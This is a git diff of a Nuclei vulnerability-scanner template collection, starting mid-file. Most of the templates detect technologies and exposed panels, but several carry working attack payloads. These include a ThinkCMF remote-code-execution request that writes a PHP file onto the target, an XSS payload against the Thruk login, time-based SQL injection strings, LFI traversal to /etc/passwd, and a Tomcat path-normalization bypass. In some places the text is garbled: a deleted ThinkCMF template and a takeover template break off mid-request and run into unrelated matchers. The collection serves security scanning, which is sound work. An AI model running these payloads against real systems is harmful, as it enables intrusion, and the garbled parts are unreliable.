'{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' - - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'Invalid length for a Base-64 char array' diff --git a/nuclei-templates/Other/telerik-dialoghandler-detect-10691.yaml b/nuclei-templates/Other/telerik-dialoghandler-detect-10691.yaml new file mode 100644 index 0000000000..6342e702d6 --- /dev/null +++ b/nuclei-templates/Other/telerik-dialoghandler-detect-10691.yaml @@ -0,0 +1,40 @@ +id: telerik-dialoghandler-detect + +info: + name: Detect Telerik Web UI Dialog Handler + author: organiccrap,zhenwarx + severity: info + reference: + - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html + - https://github.com/bao7uo/dp_crypto + tags: telerik,asp + +requests: + - method: GET + path: + - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1' + - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'Invalid length for a Base-64 char array' diff --git a/nuclei-templates/Other/telerik-fileupload-detect-10692.yaml b/nuclei-templates/Other/telerik-fileupload-detect-10692.yaml new file mode 100644 index 0000000000..86d0a3b7cd --- /dev/null +++ b/nuclei-templates/Other/telerik-fileupload-detect-10692.yaml @@ -0,0 +1,14 @@ +id: telerik-fileupload-detect +info: + name: Detect Telerik Web UI fileupload handler + author: organiccrap + severity: info + tags: tech,telerik,fileupload +requests: + - method: GET + path: + - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" + matchers: + - type: word + words: + - "RadAsyncUpload handler is registered succesfully" diff --git a/nuclei-templates/Other/telerik-fileupload-detect-10695.yaml b/nuclei-templates/Other/telerik-fileupload-detect-10695.yaml deleted file mode 100644 index 86548a9cc0..0000000000 --- a/nuclei-templates/Other/telerik-fileupload-detect-10695.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: telerik-fileupload-detect -info: - name: Detect Telerik Web UI Fileupload Handler - description: This template detects the Telerik Web UI fileupload handler. - author: organiccrap - severity: info - tags: tech,telerik,fileupload -requests: - - method: GET - path: - - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" - matchers: - - type: word - words: - - "RadAsyncUpload handler is registered succesfully" - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/tempera.yaml b/nuclei-templates/Other/tempera.yaml new file mode 100644 index 0000000000..13cdead6ab --- /dev/null +++ b/nuclei-templates/Other/tempera.yaml @@ -0,0 +1,59 @@ +id: tempera + +info: + name: > + Tempera <= 1.8.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c33f8b0d-97d9-4d00-bd31-444ee2afbfe6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/tempera/" + google-query: inurl:"/wp-content/themes/tempera/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,tempera,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/tempera/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tempera" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.2') \ No newline at end of file diff --git a/nuclei-templates/Other/keo-router-klr300n.yaml b/nuclei-templates/Other/template_klr300n-exposure.yaml similarity index 100% rename from nuclei-templates/Other/keo-router-klr300n.yaml rename to nuclei-templates/Other/template_klr300n-exposure.yaml diff --git a/nuclei-templates/Other/teradici-pcoip-10703.yaml b/nuclei-templates/Other/teradici-pcoip-10704.yaml similarity index 100% rename from nuclei-templates/Other/teradici-pcoip-10703.yaml rename to nuclei-templates/Other/teradici-pcoip-10704.yaml diff --git a/nuclei-templates/Other/terraform-detect-10707.yaml b/nuclei-templates/Other/terraform-detect-10707.yaml new file mode 100644 index 0000000000..2ba8d1cd70 --- /dev/null +++ b/nuclei-templates/Other/terraform-detect-10707.yaml @@ -0,0 +1,22 @@ +id: terraform-detect +info: + name: Detect Terraform Provider + author: geeknik + description: Write Infrastructure as Code - https://www.terraform.io/ + severity: info + tags: tech,terraform +requests: + - method: GET + path: + - "{{BaseURL}}/provider.tf" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "access_key" + - "terraform" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/terraform-detect-10708.yaml b/nuclei-templates/Other/terraform-detect-10708.yaml deleted file mode 100644 index 4a458c77e2..0000000000 --- a/nuclei-templates/Other/terraform-detect-10708.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: terraform-detect - -info: - name: Detect Terraform Provider - author: geeknik - description: Write Infrastructure as Code - https://www.terraform.io/ - severity: info - tags: tech,terraform - -requests: - - method: GET - path: - - "{{BaseURL}}/provider.tf" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - access_key - - terraform - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/terraform-enterprise-panel-10710.yaml b/nuclei-templates/Other/terraform-enterprise-panel-10710.yaml index 5d7616eec6..e63c9ad83c 100644 --- a/nuclei-templates/Other/terraform-enterprise-panel-10710.yaml +++ b/nuclei-templates/Other/terraform-enterprise-panel-10710.yaml @@ -1,27 +1,25 @@ id: terraform-enterprise-panel + info: name: Terraform Enterprise Panel - author: Adam Crosser,idealphase + author: Adam Crosser severity: info - description: Terraform Enterprise is our self-hosted distribution of Terraform Cloud. It offers enterprises a private instance of the Terraform Cloud application, with no resource limits and with additional enterprise-grade architectural features like audit logging and SAML single sign-on. - reference: - - https://www.terraform.io/enterprise/releases - metadata: - shodan-query: title:"Terraform Enterprise" - google-query: intitle:"Terraform Enterprise" tags: panel,terraform + requests: - method: GET path: - '{{BaseURL}}/session' + redirects: true max-redirects: 2 matchers: - type: word words: - "Terraform Enterprise" + extractors: - type: regex group: 1 regex: - - '(.+)<\/span>' + - '(?i)([A-Za-z 0-9.]+)' \ No newline at end of file diff --git a/nuclei-templates/Other/thinkcmf-detection-10718.yaml b/nuclei-templates/Other/thinkcmf-detect.yaml similarity index 100% rename from nuclei-templates/Other/thinkcmf-detection-10718.yaml rename to nuclei-templates/Other/thinkcmf-detect.yaml diff --git a/nuclei-templates/Other/thinkcmf-lfi-10724.yaml b/nuclei-templates/Other/thinkcmf-lfi-10724.yaml deleted file mode 100644 index 3997c697e3..0000000000 --- a/nuclei-templates/Other/thinkcmf-lfi-10724.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: thinkcmf-lfi -info: - name: ThinkCMF LFI - author: pikpikcu - severity: high - reference: - - https://www.freebuf.com/vuls/217586.html - metadata: - win-payload: ../../../../../../../../../../../../../../../../windows/win.ini - unix-payload: ../../../../../../../../../../../../../../../../etc/passwd - tags: thinkcmf,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/?a=display&templateFile=README.md" - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "ThinkCMF" - - "## README" - - "## UPDATE" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/thinkcmf-rce-10727.yaml b/nuclei-templates/Other/thinkcmf-rce-10727.yaml new file mode 100644 index 0000000000..0173c895e9 --- /dev/null +++ b/nuclei-templates/Other/thinkcmf-rce-10727.yaml @@ -0,0 +1,24 @@ +id: thinkcmf-rce +info: + name: ThinkCMF RCE + author: pikpikcu + severity: critical + reference: https://www.freebuf.com/vuls/217586.html + tags: thinkcmf,rce +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B" + - method: GET + path: + - "{{BaseURL}}/poc.php" + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/thinkcmf-rce-10729.yaml b/nuclei-templates/Other/thinkcmf-rce-10729.yaml deleted file mode 100644 index c8890e84e4..0000000000 --- a/nuclei-templates/Other/thinkcmf-rce-10729.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: thinkcmf-rce -info: - name: ThinkCMF - Remote Code Execution - author: pikpikcu - severity: critical - description: ThinkCMF is susceptible to a remote code execution vulnerability. - reference: - - https://www.freebuf.com/vuls/217586.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: thinkcmf,rce -requests: - - raw: - - | - GET /index.php?a=fetch&content={{url_encode('" - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/Other/thruk-xss-10759.yaml b/nuclei-templates/Other/thruk-xss-10759.yaml new file mode 100644 index 0000000000..ec056e3be3 --- /dev/null +++ b/nuclei-templates/Other/thruk-xss-10759.yaml @@ -0,0 +1,34 @@ +id: thruk-xss + +info: + name: Thruk Monitoring Webinterface - XSS + author: pikpikcu + severity: medium + reference: https://www.thruk.org/download.html + tags: xss,thruk + +requests: + - raw: + - | + POST /thruk/cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/thruk/cgi-bin/login.cgi?thruk + + referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/Other/thumbs-db-disclosure-10763.yaml b/nuclei-templates/Other/thumbs-db-disclosure-10763.yaml new file mode 100644 index 0000000000..728de9d555 --- /dev/null +++ b/nuclei-templates/Other/thumbs-db-disclosure-10763.yaml @@ -0,0 +1,21 @@ +id: thumbs-db-disclosure +info: + name: Thumbs DB Disclosure + author: dhiyaneshDk + severity: info + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json + tags: exposure,files +requests: + - method: GET + path: + - "{{BaseURL}}/Thumbs.db" + matchers-condition: and + matchers: + - type: binary + binary: + - 'D0CF11E0A1B11AE1' + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/thumbs-db-disclosure.yaml b/nuclei-templates/Other/thumbs-db-disclosure.yaml deleted file mode 100644 index b5ee7b65d9..0000000000 --- a/nuclei-templates/Other/thumbs-db-disclosure.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: thumbs-db-disclosure - -info: - name: Thumbs DB Disclosure - author: dhiyaneshDk - severity: info - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json - tags: exposure,files - -requests: - - method: GET - path: - - "{{BaseURL}}/Thumbs.db" - matchers-condition: and - matchers: - - type: binary - binary: - - 'D0CF11E0A1B11AE1' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/tictail-takeover-10766.yaml b/nuclei-templates/Other/tictail-takeover-10766.yaml deleted file mode 100644 index 89c984e159..0000000000 --- a/nuclei-templates/Other/tictail-takeover-10766.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: tictail-takeover - -info: - name: tictail takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - 'Building a brand of your own?' - - 'to target URL: alert(31337)" part: body - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/Other/tilda-takeover-10784.yaml b/nuclei-templates/Other/tilda-takeover-10784.yaml new file mode 100644 index 0000000000..0f3df22c3c --- /dev/null +++ b/nuclei-templates/Other/tilda-takeover-10784.yaml @@ -0,0 +1,21 @@ +id: tilda-takeover +info: + name: tilda takeover detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/155 + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - Please go to the site settings and put the domain name in the Domain tab. + - type: word + words: + - "Please renew your subscription" + negative: true diff --git a/nuclei-templates/Other/tilda-takeover.yaml b/nuclei-templates/Other/tilda-takeover.yaml deleted file mode 100644 index 7f61b8f017..0000000000 --- a/nuclei-templates/Other/tilda-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: tilda-takeover -info: - name: tilda takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/155 -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - Please go to the site settings and put the domain name in the Domain tab. - - type: word - words: - - "Please renew your subscription" - negative: true diff --git a/nuclei-templates/Other/tileserver-gl-10786.yaml b/nuclei-templates/Other/tileserver-gl-10787.yaml similarity index 100% rename from nuclei-templates/Other/tileserver-gl-10786.yaml rename to nuclei-templates/Other/tileserver-gl-10787.yaml diff --git a/nuclei-templates/Other/time-sql-test.yaml b/nuclei-templates/Other/time-sql-test.yaml new file mode 100644 index 0000000000..bfaf78fa93 --- /dev/null +++ b/nuclei-templates/Other/time-sql-test.yaml @@ -0,0 +1,22 @@ +id: time-based-sqli-uri-finder + +info: + name: Time-Based SQL Injection in URI + description: Test for Time-Based SQL Injection in URI + author: erickfernandox + severity: high + tags: sqlinjection + + +requests: + - method: GET + path: + - "{{BaseURL}}/0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z/" + - "{{BaseURL}}/?article_id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&category=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&city=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&country=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&email=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&language=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&page=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&password=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&product_id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&search=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&state=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&user=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&username=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&zip=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z" + - "{{BaseURL}}/?article_id=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&category=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&city=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&country=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&email=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&id=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&language=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&page=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&password=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&product_id=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&search=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&state=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&user=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&username=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&zip=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z" + + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'duration>=9' diff --git a/nuclei-templates/Other/time-sqlinjection-uri-finder.yaml b/nuclei-templates/Other/time-sqlinjection-uri-finder.yaml deleted file mode 100644 index 2e210c8516..0000000000 --- a/nuclei-templates/Other/time-sqlinjection-uri-finder.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: time-based-sqli-uri-finder - -info: - name: Time-Based SQL Injection in URI - description: Test for Time-Based SQL Injection in URI - author: erickfernandox - severity: critical - tags: sqlinjection - - -requests: - - method: GET - path: - - "{{BaseURL}}/dont-work-sqli" - - "{{BaseURL}}/0'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z" - - "{{BaseURL}}/0%27XOR(if(now()=sysdate()%2Csleep(5*5)%2C0))XOR%27Z" - - "{{BaseURL}}'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z" - - "{{BaseURL}}%27XOR(if(now()=sysdate()%2Csleep(5*5)%2C0))XOR%27Z" - - "{{BaseURL}}/(SELECT(0)FROM(SELECT(SLEEP(10)))a)/" - - "{{BaseURL}}'%20AND%20(SELECT 5735 FROM (SELECT(SLEEP(10)))YpRn)%20AND%20'Jswp'='Jswp" - - "{{BaseURL}}%27%20AND%20(SELECT+5735+FROM+(SELECT(SLEEP(5*5)))YpRn)%20AND%20%27Jswp%27=%27Jswp" - - "{{BaseURL}}/'%20AND%20(SELECT 5735 FROM (SELECT(SLEEP(10)))YpRn)%20AND%20'Jswp'='Jswp" - - "{{BaseURL}}?id=0'AND%20(SELECT%205735%20FROM%20(SELECT(SLEEP(10)))YpRn)%20AND%20'Jswp'='Jswp" - - "{{BaseURL}}/,(select+*+from+(select(sleep(10)))a)/" - - "{{BaseURL}}/1)+or+sleep(10)#/" - - "{{BaseURL}})+or+sleep(10)#/" - - "{{BaseURL}}/1'+and+sleep(10)" - - "{{BaseURL}}/1%27+and+sleep(10)" - - "{{BaseURL}}/'sleep(10)%20--//" - - "{{BaseURL}}'%20sleep(10)%20--//" - - "{{BaseURL}}/AND+SLEEP(10)--" - - "{{BaseURL}}/'+AND+SLEEP(10)+AND+'1" - - "{{BaseURL}}'+AND+SLEEP(10)+AND+'1" - - "{{BaseURL}}%27+AND+SLEEP(10)+AND+%271" - - "{{BaseURL}}/+ORDER+BY+SLEEP(10)/" - - "{{BaseURL}}/AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))bAKL)+AND+'vRxe'='vRxe" - - matchers-condition: or - matchers: - - type: dsl - dsl: - - 'duration>=10' diff --git a/nuclei-templates/Other/titannit-web-rce.yaml b/nuclei-templates/Other/titannit-web-ssrf.yaml similarity index 100% rename from nuclei-templates/Other/titannit-web-rce.yaml rename to nuclei-templates/Other/titannit-web-ssrf.yaml diff --git a/nuclei-templates/Other/tomcat-default-login-10789.yaml b/nuclei-templates/Other/tomcat-default-login-10790.yaml similarity index 100% rename from nuclei-templates/Other/tomcat-default-login-10789.yaml rename to nuclei-templates/Other/tomcat-default-login-10790.yaml diff --git a/nuclei-templates/Other/tomcat-detect-10794.yaml b/nuclei-templates/Other/tomcat-detect-10794.yaml new file mode 100644 index 0000000000..bf98e742d9 --- /dev/null +++ b/nuclei-templates/Other/tomcat-detect-10794.yaml @@ -0,0 +1,31 @@ +id: tomcat-detect +info: + name: Tomcat Detection + author: philippedelteil,dhiyaneshDk + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. + severity: info + tags: tech,tomcat,apache + metadata: + shodan-query: title:"Apache Tomcat" +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/{{randstr}}" + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(tolower(all_headers), "tomcat")' + - type: dsl + dsl: + - 'contains(tolower(body), "apache tomcat")' + - 'contains(tolower(body), "/manager/html")' + - 'contains(tolower(body), "/manager/status")' + condition: or + extractors: + - type: regex + group: 1 + regex: + - '(?i)Apache Tomcat.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/nuclei-templates/Other/tomcat-detect.yaml b/nuclei-templates/Other/tomcat-detect.yaml deleted file mode 100644 index 311b9e53c9..0000000000 --- a/nuclei-templates/Other/tomcat-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: tomcat-detect -info: - name: Tomcat Detection - author: philippedelteil,dhiyaneshDk - severity: info - description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. - metadata: - shodan-query: title:"Apache Tomcat" - tags: tech,tomcat,apache -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/{{randstr}}" - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "tomcat")' - - type: dsl - dsl: - - 'contains(tolower(body), "apache tomcat")' - - 'contains(tolower(body), "/manager/html")' - - 'contains(tolower(body), "/manager/status")' - condition: or - extractors: - - type: regex - group: 1 - regex: - - '(?i)Apache Tomcat.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/nuclei-templates/Other/tomcat-manager-pathnormalization.yaml b/nuclei-templates/Other/tomcat-manager-pathnormalization.yaml deleted file mode 100644 index 14057b9f2b..0000000000 --- a/nuclei-templates/Other/tomcat-manager-pathnormalization.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: tomcat-manager-pathnormalization -info: - name: Tomcat Manager Path Normalization - author: organiccrap - severity: info - reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/..;/manager/html' - - '{{BaseURL}}/..;/host-manager/html' - matchers-condition: and - matchers: - - type: word - words: - - 'username="tomcat" password="s3cret"' - - 'manager-gui' - condition: and - - type: status - status: - - 403 - - 401 - negative: true diff --git a/nuclei-templates/Other/tomcat-pathnormalization-10800.yaml b/nuclei-templates/Other/tomcat-pathnormalization-10800.yaml new file mode 100644 index 0000000000..fd0566325e --- /dev/null +++ b/nuclei-templates/Other/tomcat-pathnormalization-10800.yaml @@ -0,0 +1,34 @@ +id: tomcat-manager-pathnormalization +info: + name: Tomcat Manager Path Normalization + author: organiccrap + severity: info + description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target operating system. + reference: + - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + tags: panel,tomcat,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 +requests: + - method: GET + path: + - '{{BaseURL}}/..;/manager/html' + - '{{BaseURL}}/..;/host-manager/html' + matchers-condition: and + matchers: + - type: word + words: + - 'username="tomcat" password="s3cret"' + - 'manager-gui' + condition: and + - type: status + negative: true + status: + - 403 + - 401 + +# Enhanced by mp on 2022/03/17 diff --git a/nuclei-templates/Other/tomcat-scripts-10801.yaml b/nuclei-templates/Other/tomcat-scripts-10801.yaml new file mode 100644 index 0000000000..1d0aa79690 --- /dev/null +++ b/nuclei-templates/Other/tomcat-scripts-10801.yaml @@ -0,0 +1,23 @@ +id: tomcat-scripts +info: + name: Detect Tomcat Exposed Scripts + author: Co0nan + severity: info + tags: apache,tomcat +requests: + - method: GET + path: + - "{{BaseURL}}/examples/servlets/index.html" + - "{{BaseURL}}/examples/jsp/index.html" + - "{{BaseURL}}/examples/websocket/index.xhtml" + - "{{BaseURL}}/..;/examples/servlets/index.html" + - "{{BaseURL}}/..;/examples/jsp/index.html" + - "{{BaseURL}}/..;/examples/websocket/index.xhtml" + matchers: + - type: word + words: + - "JSP Examples" + - "JSP Samples" + - "Servlets Examples" + - "WebSocket Examples" + condition: or diff --git a/nuclei-templates/Other/tomcat-scripts-10802.yaml b/nuclei-templates/Other/tomcat-scripts-10802.yaml deleted file mode 100644 index e588d87c77..0000000000 --- a/nuclei-templates/Other/tomcat-scripts-10802.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: tomcat-scripts - -info: - name: Detect Tomcat Exposed Scripts - author: Co0nan - severity: info - tags: apache,tomcat - -requests: - - method: GET - path: - - "{{BaseURL}}/examples/servlets/index.html" - - "{{BaseURL}}/examples/jsp/index.html" - - "{{BaseURL}}/examples/websocket/index.xhtml" - - "{{BaseURL}}/..;/examples/servlets/index.html" - - "{{BaseURL}}/..;/examples/jsp/index.html" - - "{{BaseURL}}/..;/examples/websocket/index.xhtml" - - matchers: - - type: word - words: - - "JSP Examples" - - "JSP Samples" - - "Servlets Examples" - - "WebSocket Examples" - condition: or diff --git a/nuclei-templates/Other/top-xss-params-10807.yaml b/nuclei-templates/Other/top-xss-params.yaml similarity index 100% rename from nuclei-templates/Other/top-xss-params-10807.yaml rename to nuclei-templates/Other/top-xss-params.yaml diff --git a/nuclei-templates/Other/tor-socks-proxy-10812.yaml b/nuclei-templates/Other/tor-socks-proxy-10812.yaml deleted file mode 100644 index 4957f092b8..0000000000 --- a/nuclei-templates/Other/tor-socks-proxy-10812.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: tor-socks-proxy - -info: - name: Detect tor SOCKS proxy - author: geeknik - severity: info - tags: tech,tor,proxy - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "This is a SOCKS Proxy" - - "HTTPTunnelPort" - - "SOCKSPort" - condition: and - - type: status - status: - - 501 diff --git a/nuclei-templates/Other/tor-socks-proxy.yaml b/nuclei-templates/Other/tor-socks-proxy.yaml new file mode 100644 index 0000000000..36b5f88a08 --- /dev/null +++ b/nuclei-templates/Other/tor-socks-proxy.yaml @@ -0,0 +1,21 @@ +id: tor-socks-proxy +info: + name: Detect tor SOCKS proxy + author: geeknik + severity: info + tags: tech,tor,proxy +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - "This is a SOCKS Proxy" + - "HTTPTunnelPort" + - "SOCKSPort" + condition: and + - type: status + status: + - 501 diff --git a/nuclei-templates/Other/total-web-10814.yaml b/nuclei-templates/Other/total-web-10814.yaml deleted file mode 100644 index ba8a8510dc..0000000000 --- a/nuclei-templates/Other/total-web-10814.yaml +++ /dev/null @@ -1,22 